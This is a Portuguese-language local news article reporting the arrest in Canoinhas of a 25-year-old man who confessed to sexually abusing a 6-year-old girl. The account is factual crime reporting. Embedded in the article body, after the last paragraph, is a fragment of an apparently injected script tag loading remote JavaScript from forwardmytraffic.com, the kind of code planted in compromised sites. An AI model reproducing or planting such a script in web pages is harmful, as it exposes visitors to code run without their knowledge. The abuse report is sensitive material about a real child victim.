InícioDestaqueCriança de 6 Anos é Vítima de Estupro

Criança de 6 Anos é Vítima de Estupro

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

No sábado, 11, por volta das 21h10, equipes da PM de Canoinhas foram acionadas via Copom 190 para deslocar na Rua João da Cruz Krailing, no Pronto Atendimento do Hospital Santa Cruz para verificar a denúncia de estupro de vulnerável.

 

No local, os policiais militares conversaram com a mãe de uma menina de 06 anos de idade que relatou que um conhecido da família, havia ficado sozinho com sua filha em um quarto e quando a mãe foi verificar a porta estava trancada, a mãe solicitou que a mesma fosse aberta e percebeu que sua filha estava assustada. Ao indagá-la a criança relatou que o jovem havia abaixado sua calça e passado o pênis em sua genital.

 

Os policiais militares deslocaram na Rua Wiegano Wize, Cohab 2 no município de Canoinhas e conversaram com o jovem de 25 anos de idade que acabou confessando o ato acima descrito. Diante dos fatos o jovem foi preso em flagrante e conduzido para a Delegacia para providencias cabíveis…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.